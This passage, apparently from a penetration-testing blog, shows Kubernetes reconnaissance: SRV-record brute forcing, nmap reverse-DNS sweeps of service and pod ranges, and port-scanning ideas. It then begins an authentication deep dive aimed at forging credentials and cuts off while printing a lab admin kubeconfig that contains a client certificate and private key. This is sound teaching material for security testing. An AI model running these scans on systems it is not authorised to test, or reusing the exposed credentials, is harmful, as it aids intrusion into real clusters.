<p>If we wanted to get the SRV record for the <code class="language-plaintext highlighter-rouge">grpc-otel</code> service port listening on port 4317 mentioned in the output above, we would need to do a request like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# dig +short SRV _grpc-otel._tcp.jaeger-collector.istio-system.svc.cluster.local
0 100 4317 jaeger-collector.istio-system.svc.cluster.local.
</code></pre></div></div>
<p>So, while we can easily brute force service PTR/A records by reverse resolving across a range of IPs, to get SRV records we need to start with the service A record names and then try various values for the first part of the SRV record. Based on the example above, we know that the possible values are not included within common service name information sources like <code class="language-plaintext highlighter-rouge">/etc/services</code> or even the nmap services file, and you may have to rely on additional information to find correct values. For some standardised Kubernetes applications, the service name and namespace may help you narrow down possible service port names via related documentation or source code, allowing you to build a list for brute forcing.</p>
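<p>A brute force of the port name portion of the SRV records might then look like the following sketch (the candidate name list is illustrative - seed it from documentation or source for applications you believe are running):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SVC=jaeger-collector.istio-system.svc.cluster.local
for name in http https grpc metrics web http-zipkin grpc-otel http-otel; do
    RESULT="$(dig +short SRV _${name}._tcp.${SVC})"
    [ -n "$RESULT" ] && echo "${name}: ${RESULT}"
done
</code></pre></div></div>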
<h2 id="reverse-dns-scanning-to-identify-live-systems">Reverse DNS scanning to identify live systems</h2>
<p>Let’s look at a practical example of using the Kubernetes reverse DNS entries to identify live IPs. In our example cluster we have known service IPs of <code class="language-plaintext highlighter-rouge">10.96.0.10</code> and <code class="language-plaintext highlighter-rouge">10.96.0.1</code>, which sit inside the IANA-assigned private range <code class="language-plaintext highlighter-rouge">10.0.0.0/8</code>. This is a huge number of addresses to scan, so as an initial compromise we can reduce it to a more manageable range of <code class="language-plaintext highlighter-rouge">10.96.0.0/16</code> to demonstrate the concept. A nice way to perform a reverse DNS scan of the hosts in this range is to run nmap as follows, writing the output to disk in greppable form.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# nmap -oG dns_scan_svc_1 -sn -Pn -R 10.96.0.0/16
[SNIP]
</code></pre></div></div>
<p>Once the scan is done, look at the entries in the file to identify the pattern you need to filter for. This is a local cluster, so in this case the only DNS entries that exist are those created by Kubernetes, and we want to ignore entries without a reverse name. In a cloud environment like AWS, however, unallocated IPs in the cluster will likely have AWS-created reverse entries, probably ending with something like <code class="language-plaintext highlighter-rouge">compute.internal</code>, so you will want to ignore those instead.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# head dns_scan_svc_1
# Nmap 7.91 scan initiated Wed Dec 6 07:58:28 2023 as: nmap -oG dns_scan_svc_1 -sn -Pn -R 10.96.0.0/16
Host: 10.96.0.0 () Status: Up
Host: 10.96.0.1 (kubernetes.default.svc.cluster.local) Status: Up
Host: 10.96.0.2 () Status: Up
Host: 10.96.0.3 () Status: Up
Host: 10.96.0.4 () Status: Up
Host: 10.96.0.5 () Status: Up
Host: 10.96.0.6 () Status: Up
Host: 10.96.0.7 () Status: Up
Host: 10.96.0.8 () Status: Up
</code></pre></div></div>
<p>Based on this, we want to look for entries containing the word <code class="language-plaintext highlighter-rouge">Host</code>, but exclude those that contain no reverse name (so excluding lines containing <code class="language-plaintext highlighter-rouge">()</code>). We can do this as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# grep 'Host' dns_scan_svc_1 | grep -v '()'
Host: 10.96.0.1 (kubernetes.default.svc.cluster.local) Status: Up
Host: 10.96.0.10 (kube-dns.kube-system.svc.cluster.local) Status: Up
Host: 10.96.5.10 (my-nginx-svc1.argotest.svc.cluster.local) Status: Up
Host: 10.96.114.235 (argocd-notifications-controller-metrics.argocd.svc.cluster.local) Status: Up
Host: 10.96.148.230 (argocd-redis.argocd.svc.cluster.local) Status: Up
</code></pre></div></div>
<p>We can repeat the above for some “nearby” ranges for our services (e.g. replacing the X in <code class="language-plaintext highlighter-rouge">10.X.0.0/16</code> with numbers from 90 to 120) to get a more complete list of live service hosts, as in the sketch below.</p>
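<p>A sketch of that repetition (scan time adds up quickly, so adjust the range to suit):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>for x in $(seq 90 120); do
    nmap -oG dns_scan_svc_10_${x} -sn -Pn -R 10.${x}.0.0/16
done
grep 'Host' dns_scan_svc_10_* | grep -v '()'
</code></pre></div></div>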
<p>The pod network is a bit more reasonably sized; we can cover the entire thing with the CIDR <code class="language-plaintext highlighter-rouge">172.16.0.0/12</code>. Let’s repeat the nmap process from above with that range.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# nmap -oG dns_scan_svc_2 -sn -Pn -R 172.16.0.0/12
[SNIP]
bash-5.1# grep 'Host' dns_scan_svc_2 | grep -v '()'
Host: 172.16.7.136 (172-16-7-136.theia.default.svc.cluster.local) Status: Up
Host: 172.16.7.139 (172-16-7-139.istio-egressgateway.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.140 (172-16-7-140.kiali.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.142 (172-16-7-142.jaeger-collector.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.143 (172-16-7-143.istiod.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.145 (172-16-7-145.ichnaea.default.svc.cluster.local) Status: Up
Host: 172.16.7.146 (172-16-7-146.kube-dns.kube-system.svc.cluster.local) Status: Up
Host: 172.16.7.151 (172-16-7-151.argocd-metrics.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.152 (172-16-7-152.argocd-server.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.153 (172-16-7-153.argocd-notifications-controller-metrics.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.154 (172-16-7-154.argocd-applicationset-controller.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.155 (172-16-7-155.istio-ingressgateway.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.156 (172-16-7-156.argocd-dex-server.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.157 (172-16-7-157.grafana.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.159 (hacker-container) Status: Up
Host: 172.16.7.161 (172-16-7-161.kube-dns.kube-system.svc.cluster.local) Status: Up
Host: 172.16.7.163 (172-16-7-163.argocd-repo-server.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.165 (172-16-7-165.argocd-redis.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.166 (172-16-7-166.prometheus.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.177 (172-16-7-177.my-nginx-svc1.argotest.svc.cluster.local) Status: Up
Host: 172.16.7.182 (172-16-7-182.haproxy.default.svc.cluster.local) Status: Up
Host: 172.16.7.184 (172-16-7-184.mitmproxy.default.svc.cluster.local) Status: Up
</code></pre></div></div>
<p>Based on this, we can see that the live pods associated with services all congregate within the subnet <code class="language-plaintext highlighter-rouge">172.16.7.0/24</code> - if we wanted to specifically scan to identify other pods not backed by services, this range would be a good one on which to concentrate other scanning techniques. If you have a service mesh preventing TCP connect scanning as a way of identifying other hosts, see the next section for a last ditch option.</p>
<h2 id="port-scanning-of-live-hosts">Port scanning of live hosts</h2>
<p>Once you have a list of live IPs, the next step is identifying open ports. In the absence of a service mesh complicating things by showing all ports open as discussed above, the quickest way to achieve this is simple port scanning with nmap or similar. Otherwise, I can think of two other options.</p>
<p>For IPs in the service range, each valid port will have an associated SRV DNS record as discussed in the section on Kubernetes DNS above. This means you can start with the service A record name, for example <code class="language-plaintext highlighter-rouge">service.namespace.svc.cluster.local</code>, and try to brute force TCP SRV records using a pattern like <code class="language-plaintext highlighter-rouge">_[value]._tcp.service.namespace.svc.cluster.local</code>.</p>
<p>As a last ditch option, I modified an existing Python port scanner I found to identify open ports by trying to trigger an application level response after a successful TCP connection. This is conceptually similar to the way UDP scanning works in nmap, and does largely work, but the implementation is still rudimentary and not 100% reliable. If you want, you can grab it <a href="https://github.com/stephenbradshaw/pentesting_stuff/blob/master/utilities/appportscan.py">here</a>.</p>
<h1 id="kubernetes-authentication-deep-dive">Kubernetes Authentication Deep Dive</h1>
<p>In this post I’m going to do a deep dive into two of the most commonly used authentication mechanisms for Kubernetes.</p>
<p>I will cover:</p>
<ul>
<li>How the default forms of user and service account authentication in Kubernetes work and how you can perform them using curl</li>
<li>A description of the cryptographic mechanisms that provide security for these authentication methods</li>
<li>How you can forge your own credentials for both authentication methods given the right information</li>
</ul>
<p>As well as providing detail on Kubernetes authentication, this post is also intended as a practical example to demonstrate how you can analyse a simple cryptosystem in order to attack it.</p>
<h1 id="kubernetes-test-environment">Kubernetes test environment</h1>
<p>For this blog post I will be using a simple Kubernetes system built on a single Ubuntu 22.04 VM. This is a throwaway reference system, not reachable from the Internet, set up purely for the purpose of this guide. I’m using a dedicated system because I will be showing some of its critical secrets in this post, which you should never do for a system you actually intend to use.</p>
<p>I used <a href="https://www.linuxtechi.com/install-kubernetes-on-ubuntu-22-04/">this guide</a> to set up Kubernetes, but skipped the worker nodes sections to create a single node cluster. You can set up your own Kubernetes using the same guide if you want to follow along - it’s a pretty quick process - but be aware that specific keys and identifiers will look different from mine.</p>
<p>If you are following this install guide and only using one node like me, you will need to remove the “taint” on the master node to run additional containers on it. This is done by getting the node name using <code class="language-plaintext highlighter-rouge">kubectl get nodes</code> and then running the following command, substituting your node name in the appropriate spot.</p>
<p>You will need to do this <strong>before</strong> step 9 in the tutorial or the test nginx deployment will not launch.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ kubectl taint nodes <node_name> node-role.kubernetes.io/control-plane:NoSchedule-
</code></pre></div></div>
<h1 id="kubernetes-101">Kubernetes 101</h1>
<p>This section will provide enough of an introduction to Kubernetes to understand the rest of this post. If you have used Kubernetes before and feel comfortable you understand what it is, feel free to skip ahead.</p>
<p>Kubernetes is an extensible framework of microservices that assist with running <a href="https://kubernetes.io/docs/concepts/containers/">containerised</a> applications. Kubernetes runs on top of a container runtime such as docker or containerd, and the Kubernetes services run as containers themselves using this runtime.</p>
<p>If you installed the Kubernetes base system as described in the previous section, we can use the <a href="https://kubernetes.io/docs/reference/kubectl/">kubectl</a> admin tool to explore the system and see how it looks. List the <a href="https://kubernetes.io/docs/concepts/workloads/pods/">pods</a> in the <code class="language-plaintext highlighter-rouge">kube-system</code> <a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/">namespace</a> and you will see some of the services that make Kubernetes work. Here is my list of pods running in this namespace created via the install guide in the previous section.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
calico-kube-controllers-658d97c59c-88r9c 1/1 Running 0 127m
calico-node-fwptx 1/1 Running 0 127m
coredns-5dd5756b68-snhk5 1/1 Running 0 128m
coredns-5dd5756b68-vlb88 1/1 Running 0 128m
etcd-kubemaster.thezoo.local 1/1 Running 0 128m
kube-apiserver-kubemaster.thezoo.local 1/1 Running 0 128m
kube-controller-manager-kubemaster.thezoo.local 1/1 Running 0 128m
kube-proxy-w2xfd 1/1 Running 0 128m
kube-scheduler-kubemaster.thezoo.local 1/1 Running 0 128m
</code></pre></div></div>
<p>Some of the more important pods you see include:</p>
<ul>
<li><a href="https://coredns.io/">coredns</a> to provide internal DNS services in the cluster</li>
<li><a href="https://docs.tigera.io/calico/latest/about/">calico</a> to provide L3/L4 networking for the cluster</li>
<li><a href="https://etcd.io/">etcd</a> that acts as a key-value datastore for the Kubernetes system</li>
<li><a href="https://kubernetes.io/docs/concepts/scheduling-eviction/kube-scheduler/">kube-scheduler</a> which coordinates running containers on available nodes</li>
<li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kube-controller-manager/">kube-controller-manager</a> which maintains the cluster state</li>
<li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kube-proxy/">kube-proxy</a> which runs on each node and forwards traffic to containers</li>
<li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/">kube-apiserver</a> which exposes a HTTP API that acts as the primary way to interface with Kubernetes as an admin or developer user of the system</li>
</ul>
<p>Given that the API server is the primary way in which users of the system interact with Kubernetes, when I talk about Kubernetes authentication in this post, what I am referring to is authenticating to the API server. There are some other <a href="https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster">edge</a> <a href="https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/">cases</a> with authentication, but we won’t specifically consider those here.</p>
<h1 id="kubernetes-authentication-overview">Kubernetes authentication overview</h1>
<p>There are two categories of user in a Kubernetes system:</p>
<ul>
<li><strong>Normal users</strong> - representing people configuring the Kubernetes install or using it to run containers. These are usually systems administrators or developers.</li>
<li><strong>Service accounts</strong> - representing system processes that run within the cluster. Running pods have a service account associated with them by default.</li>
</ul>
<p>Kubernetes has an extensible authentication system for its API server that is described in really good detail <a href="https://kubernetes.io/docs/reference/access-authn-authz/authentication/">here</a>. The extensibility does mean that there can be some variation in authentication configuration for custom Kubernetes installs, but default installs tend to support the methods I’ll be talking about below.</p>
<p>These methods are:</p>
<ul>
<li><strong>Normal user</strong> - X.509 certificate based authentication</li>
<li><strong>Service account</strong> - JWT based authentication</li>
</ul>
<p>Related to authentication (which is intended to verify the identity of an entity interacting with the system) is <a href="https://kubernetes.io/docs/reference/access-authn-authz/authorization/">authorization</a> (determining what verified users are allowed to do in the system). I won’t describe this in detail in this post, but I do want to mention that it exists, as it will be referenced when I talk about forging user certificates later in the post.</p>
<p>You can verify the authorization methods in use by checking the runtime configuration of the API server using a command like the following. You will need to change the pod name in the command to that of your own API server, getting its value using the <code class="language-plaintext highlighter-rouge">kubectl get pods -n kube-system</code> command as demonstrated in the previous section. The following shows that the <a href="https://kubernetes.io/docs/reference/access-authn-authz/node/">Node</a> and <a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/">RBAC</a> authorization modes are enabled on my API server.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ kubectl describe pods kube-apiserver-kubemaster.thezoo.local -n kube-system | grep authorization
--authorization-mode=Node,RBAC
</code></pre></div></div>
<h1 id="rsa-and-x509-101">RSA and X.509 101</h1>
<p>The use of RSA cryptography and X.509 certificates is central to the authentication methods I’m about to discuss, so I’m going to provide a quick overview of how they work for those who are unfamiliar. Feel free to skip ahead if you don’t need the refresher.</p>
<h2 id="rsa">RSA</h2>
<p>RSA refers to a public key cryptosystem, where key pairs consisting of a private and a public key can be used to encrypt data for confidentiality and to sign data to prove the identity of the private key owner. This is known as asymmetric encryption, where different keys are used for encrypting and decrypting, as opposed to symmetric encryption, where the same key is used for both processes. The public key can be freely distributed and publicly associated with the keypair’s owner in various ways. The private key is always kept private, and is an effective superset of both keys, although the reverse is not true. That is, the public key can be extracted from the private, but the private key cannot be extracted from the public (at least for keys of sufficient size, although the size of “secure” keys grows with available computing power). The relationship between the keys is such that performing the cryptographic process with either of the keys is reversed by performing it with the paired key.</p>
<p>Encryption (to keep data secret) is performed by running the algorithm using the public key. The transformed data can then only be converted to its original form by using the private key - meaning only the private key owner can read data made secret with their public key.</p>
<p>Signing (to prove a particular set of data originates from a given entity) is done using the private key. Usually, the data to be signed is hashed, and the hash is passed through the encryption algorithm to generate a signature. Then, when the signature is run through the RSA algorithm with the widely available public key, it should result in the same hash value that can be generated independently from the data. If the hash generated from a given piece of data matches the signature verified using a particular public key, you know that data came from an entity with knowledge of the associated private key.</p>
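<p>If you want to see this sign/verify flow in action, the openssl command line tool can demonstrate it with a throwaway keypair (an illustrative sketch only - this is not something Kubernetes itself does on your behalf):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># generate a throwaway 2048 bit RSA keypair and extract the public key
openssl genrsa -out priv.pem 2048
openssl rsa -in priv.pem -pubout -out pub.pem
# sign the SHA256 hash of a file with the private key
echo 'example data' > data.txt
openssl dgst -sha256 -sign priv.pem -out data.sig data.txt
# verify the signature with the public key - prints 'Verified OK' on success
openssl dgst -sha256 -verify pub.pem -signature data.sig data.txt
</code></pre></div></div>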
<h2 id="x509">X.509</h2>
<p>X.509 is a standard for identifying entities within a system and associating them with a key pair that can be used for cryptographic operations.</p>
<p>These certificates contain a number of standard and optional fields, which have been expanded upon in subsequent versions of the standard. We will look at some of the specific fields in more detail later. The certificates also contain a copy of the public key from the associated keypair and a signature that is used to verify the authenticity of the data by reference to a trusted authority.</p>
<p>X.509 assists with verifying information in the certificates by providing a framework for certificates to exist in a chain of trust, where private keys from certificates higher in the chain sign certificates below them. Certificates that are used to sign other certificates are associated with entities known as Certificate Authorities (CAs), and contain a specific field to identify the certificate as such. Chains of trust can have one or more CAs, all descendant from an original root CA, which is always self signed (meaning that its own private key is used to generate its signature). Systems using these chains distribute the CA certificates to allow them to be used as the basis of trust for the system. The Certificate Authority is the trusted authority in these systems - the one that ultimately verifies the identity of the other entities in the system.</p>
<p>Creating descendant certificates within a chain of trust commonly involves creating a Certificate Signing Request (CSR). The private key of a CA in the chain is then used to create a signature of the details in the CSR, which is combined with identifiers for the signing CA and the CSR field data to create a signed certificate. The CSR is thus a certificate template that contains all the desired fields of the certificate, and is usually fed into a process managed by the CA that verifies the details in the CSR before returning a signed certificate. Using the CSR, the CA can fulfil its goal of confirming the accuracy of details presented in certificates in its chain whilst still maintaining control of its own private key.</p>
<p>Once they have their own certificate, entities in the chain of trust that are not CAs will usually use their associated keypair to perform additional cryptographic operations in the system. These operations are then tied to the identity information presented in the certificate. The specific way this occurs is system dependent, but usually involves additional signing or encrypting of data as mentioned above in the discussion on RSA. These certificates usually have fields included that define the specific cryptographic purposes the associated keys are intended to be used for.</p>
<p>An example of a cryptosystem using X.509 that most people will be familiar with is HTTPS (specifically its use of SSL/TLS for transport encryption). Multiple chains of trust are present here, provided by the various parties that issue SSL certificates. The details of the related CAs are distributed with Operating Systems and HTTPS clients such as web browsers. When you visit a HTTPS site in your browser, the certificate (or chain of certificates) returned by the remote site must be matched back to a trusted certificate chain in your browser’s certificate store to be trusted. The signature in the server’s certificate then needs to be verified by the client using the public key from the matching Certificate Authority certificate. Once the signature of the certificate is verified and the certificate is determined to be included in a valid chain of trust, the details in the fields of the certificate can be considered. For example: is the certificate within its validity period, does the domain name used for the connection match the ones in the certificate, has the certificate been revoked, does the certificate purpose match server identification, etc. Once these details are established to the satisfaction of the client, the public and private keys associated with the server’s certificate are then used for a key exchange that allows the communication between client and server to be encrypted.</p>
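<p>The client side of this verification flow can be sketched in a few lines of Python using the standard <code class="language-plaintext highlighter-rouge">ssl</code> module - a rough illustration only, with <code class="language-plaintext highlighter-rouge">example.com</code> standing in for any HTTPS site:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Rough sketch of HTTPS-style certificate verification from the client side
import socket
import ssl

# create_default_context() loads the client's trusted CA certificate store
ctx = ssl.create_default_context()

# The TLS handshake verifies the server's certificate chain back to a
# trusted CA and checks the hostname - it raises SSLError on failure
with socket.create_connection(('example.com', 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname='example.com') as tls:
        print(tls.getpeercert()['subject'])
</code></pre></div></div>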
<h2 id="rsa-and-x509-summarised">RSA and X.509 summarised</h2>
<p>So, in summary:</p>
<ul>
<li>RSA is an asymmetric cryptographic algorithm using keypairs consisting of public and private keys, where the public key can be derived from the private but not vice versa</li>
<li>The RSA private key is kept secret to allow the owner to identify themselves using signatures and to allow others to encrypt content only they can decrypt</li>
<li>The RSA public key is distributed widely and allows others to verify the identity of private key owners via the key owner’s signatures or to encrypt data so that only the key owner can read it</li>
<li>X.509 certificates exist in a chain of trust, beginning with a root CA which self signs its own certificate, with certificates higher in the chain signing those beneath</li>
<li>X.509 associates an asymmetric keypair with identifying information in a certificate, which is signed using the private key of a Certificate Authority in the chain</li>
<li>X.509 CA certificates are associated with trusted system entities that can authenticate details about other entities in the system using signatures</li>
<li>X.509 certificates associate identity information with the cryptographic operations performed in a cryptosystem using the certificate’s keypair</li>
</ul>
<h1 id="user-x509-certificate-based-authentication">User X.509 certificate based authentication</h1>
<p>If you have been following along with the examples so far in this post you have already used X.509 user authentication to the Kubernetes cluster, perhaps without realising it. Let’s look at how.</p>
<p>Installing Kubernetes as described in the previously mentioned setup guide created a highly privileged configuration file for use with the <code class="language-plaintext highlighter-rouge">kubectl</code> tool. The install guide advised copying this file from its default location of <code class="language-plaintext highlighter-rouge">/etc/kubernetes/admin.conf</code> to <code class="language-plaintext highlighter-rouge">~/.kube/config</code>, where the <code class="language-plaintext highlighter-rouge">kubectl</code> tool can find it.</p>
<p>Mine looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ cat ~/.kube/config
apiVersion: v1
clusters:
- cluster:
certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURCVENDQWUyZ0F3SUJBZ0lJQnk2S2RmS2tRM2d3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TXpFeE1EZ3dNVEl3TkRaYUZ3MHpNekV4TURVd01USTFORFphTUJVeApFekFSQmdOVkJBTVRDbXQxWW1WeWJtVjBaWE13Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLCkFvSUJBUUMrbFVpOGNIZFViY2JIVWJGWTJmQ1d4UTQrT245alY0aXNxWGV1eXNEK2h2VDRQYVk5VE0vT3pPd1AKT0ExWW15aFNUckFEbFMrampxZngvTzczY0UxNVN3NUpvVzNKeVRtbW84c3AxRThPREIwVTdZdE9WaXJSQk1lbgpsa0pTS1A5Qk1UTU5hSW5FYkgvOHpQNUkvWTVsY0lWR3k2YjFCWXNHLysvQndqNGJBUGdtN1pRZmtoa3lxWTJqCmp4Y1VoMC9INWJVRlhlRmR5RmhocXhJdkhhRHNLRzViaFZIUkVtdUxTSnNvVEc4eWdEL2kzbmh0a3hGMEtIeGoKQTErUUtkRGphVFlham5hY25aMmpHK0FGRU5NQzJOWXczckFNWC9QNTROcDZQOUprdWtDUytYSzJsQ3ZiM1BJcQpTYWRNSWorbElUVGplemJnY3cyY3YyQSs2QjVEQWdNQkFBR2pXVEJYTUE0R0ExVWREd0VCL3dRRUF3SUNwREFQCkJnTlZIUk1CQWY4RUJUQURBUUgvTUIwR0ExVWREZ1FXQkJUZ1liRDROOGk3UGdwUzdPS3VFYjV4bEVIRW5EQVYKQmdOVkhSRUVEakFNZ2dwcmRXSmxjbTVsZEdWek1BMEdDU3FHU0liM0RRRUJDd1VBQTRJQkFRQVVqUmlhWGZRTgphRTQ1VmN3NTIvYlhldi83WlpxN05kL2s4Q0Z5Z0tOcjJybWlOUWNJa0k3MXF2SUxEeEZoT3NOVWhhSVRHUU5aCmRZT2ZnN0Q5NzZhZ24xSHRjQUFtOUlJRUFpaG51OVNMWFc0c1F2WHBXWEcrelNOemQyMUpES0QvWXlyMm5DVE0KKzZqTVNRYmw5Z0dPalhDdUVTNGY3anlqRXRVREh5dHRpQ3hSRFVuelNvcG9ybEc4ai94emhQOGlaSEN6UlZHUAppbjlhL2lFeDlSZUNOcm5zS1NIN0p1QWZYMFl6TEFBSng1SldBNGozcW9JMmJQZ0F2L25hVU9pSmNrWVpUdWtzCndkQnJURFJUOGtycThKZ2NCTEJEa1Y2blVENDUrbGxIQUI4R3VuSFhkdElYdzR0S3RCdUxneGs0NEtVUUpkb3YKeHdmNXJ0dmZWajY2Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
server: https://kubemaster.thezoo.local:6443
name: kubernetes
contexts:
- context:
cluster: kubernetes
user: kubernetes-admin
name: kubernetes-admin@kubernetes
current-context: kubernetes-admin@kubernetes
kind: Config
preferences: {}
users:
- name: kubernetes-admin
user:
client-certificate-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURJVENDQWdtZ0F3SUJBZ0lJV28rZ1plVWE3dzR3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TXpFeE1EZ3dNVEl3TkRaYUZ3MHlOREV4TURjd01USTFORGRhTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQXloQjFlR2JmNjBUUjE5RmYKUVdYb1VmTFVNWUFERnUydDBrL1ZUbDNSYzN6VVU0bjlvYU9VME5EQ1psNzIxK3Z4RS9ISnZxdnIrTDkzbHBWTwpnRVo3dytXT1MyN2ViL2Nrd0pwYlRheHB2WGYxdFlqNm9ub1lGSUNuWTlCMGE2SG91dC9hZ1UzQUtSRmNTK0NGCkVKVU9udnkrOHF0Y1luT2RBR2Jpd1ZieXJDWlNsVVVQMnZvOWNpcC9hUUJsSk96NEs4bTlSa3hoUjFBV3FUdU4KQkRMWTVMUlN1SHNOWTRnTk8yankzcU5qUjBxS0RFZ29IMmhKUnFmR3M4ZWdMVFM3OVBMdnFkbHJ2di8waHdUWQp1UXVoNWZOWW5SRkZwR1RreFR1b2wvNWNBWmlnQkRraUtrR0c2UFR2R2tiRWd6QTNveDZIckljcFZNSHpEdzRRCjhUOEVMUUlEQVFBQm8xWXdWREFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RBWURWUjBUQVFIL0JBSXdBREFmQmdOVkhTTUVHREFXZ0JUZ1liRDROOGk3UGdwUzdPS3VFYjV4bEVIRQpuREFOQmdrcWhraUc5dzBCQVFzRkFBT0NBUUVBbmNuVnBDYUg5ck9GQkExMW5DalhISzAwRG13R1FJZnpjV2x0CkJ3RzRwR2lTK0RRR3ltODFwVEtHblhTQU1UZENvVmI2QzlrdWMrWkR0bG5iL05xZUk2WHpnVjdVbXp2V0E0N0gKSThvSHl5V3RjY1pNcUNwOTNnZUJDb3lZdW42SkpnTVozbHJhRTN6U1hxU0xzQ0hZWXpJZlRLWnFRdFFhbnBaNAp3SUVIMlBtZ1FxMmR4bmtoak9JSWF0bm54U0owdno1MDlXQVBQOStrSEpVeUh2N1V0a0pDL2J3aE5SdDh1RmluClBsN3Z3NGRUY1p4dS81SHlqcnlRcUVKUFBHS2ZnRlBja0dyclBXL1I1bUJHclVxRlZqYXN0TGQzekNMNG1GT0UKUWdyOTNMajh2ZnA1dFQrbFljRUkrYit3czdJaWFUQW9OdktVQXd4bXFmVzl2L1ZyZFE9PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
client-key-data: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb3dJQkFBS0NBUUVBeWhCMWVHYmY2MFRSMTlGZlFXWG9VZkxVTVlBREZ1MnQway9WVGwzUmMzelVVNG45Cm9hT1UwTkRDWmw3MjErdnhFL0hKdnF2citMOTNscFZPZ0VaN3crV09TMjdlYi9ja3dKcGJUYXhwdlhmMXRZajYKb25vWUZJQ25ZOUIwYTZIb3V0L2FnVTNBS1JGY1MrQ0ZFSlVPbnZ5KzhxdGNZbk9kQUdiaXdWYnlyQ1pTbFVVUAoydm85Y2lwL2FRQmxKT3o0SzhtOVJreGhSMUFXcVR1TkJETFk1TFJTdUhzTlk0Z05PMmp5M3FOalIwcUtERWdvCkgyaEpScWZHczhlZ0xUUzc5UEx2cWRscnZ2LzBod1RZdVF1aDVmTlluUkZGcEdUa3hUdW9sLzVjQVppZ0JEa2kKS2tHRzZQVHZHa2JFZ3pBM294NkhySWNwVk1IekR3NFE4VDhFTFFJREFRQUJBb0lCQURpZmhodVlVSFZBVXNGMApwWW5SQWRvOC91TmtLUGw2M3pQSk5WQUJrRmtaaVBKai85UVUzL1hvR2lIUHlNSlhGclp0RWdqQmFwM0pJYnpyCjJCU3dLNnlJbm1oYkNEQStCR21JbDc5YmFrSXk1SUxiZ01pWkNEaHVtUG1xaDRWRjJNN05QaER2OWNKTVlCM1AKSzlxcXVtOHBDbVU4U2VZNDJhMHNKNnpnTFo2NW12L1pwVWJrRDVXMGtFckNtcldWYXBrb0dHUzMraEVmZ0xuVQo3WmkwWmQxSm04RFpBcVBaZjB2K2xEcTRRNlA2cFRyWkZhSHRKeXE1R3BaaG5LdzFRSVAvZDM4SkdrWmJ2bDZTCmdLdWREZHR3UWtLWDhFc3hzUElzcHFYWmlJRnRHbEd4UjNWT3lSaXo1WlIvTDVQUDYvSHZ5QjZVMVMzU0MydW0KMGc1TW9xMENnWUVBNVA3K3J6Yjh0WkFQQzdMdTAwcm5CeUZLVWoyWUVKU3hwLy8wREtuWGtmcTZ2a01wZmo1TwpRNC8vcVJxMFBsTXlIbFF3dFpkVXdmb0Raem1tSUZGYkNucDhoYWl5Z3JVMldVZjRkc0Y4ZVExN0NPVHhURGkzCndqL3Z5MXNtaUw2OEVIMjNNeW94YitXamRaZUJKQVRSS05pWDFvbHFFUE5xVlRrd21TZkl2b01DZ1lFQTRlUncKWUNpKytqUnVwTEMzb0FvYzZWTU9zZllJdkhhTG5iQkx0SVVZWnFpaU5Namp1UHJnSE0vcnRCc3BPYmhWSCtpdQpOZ0YrS2pMa1ZsY0Rxd1NuQ20vcEdoVCtXeFhVdjNpRjRHSWQ5cm5iYVhRbklIbzNLWk56VzRKWD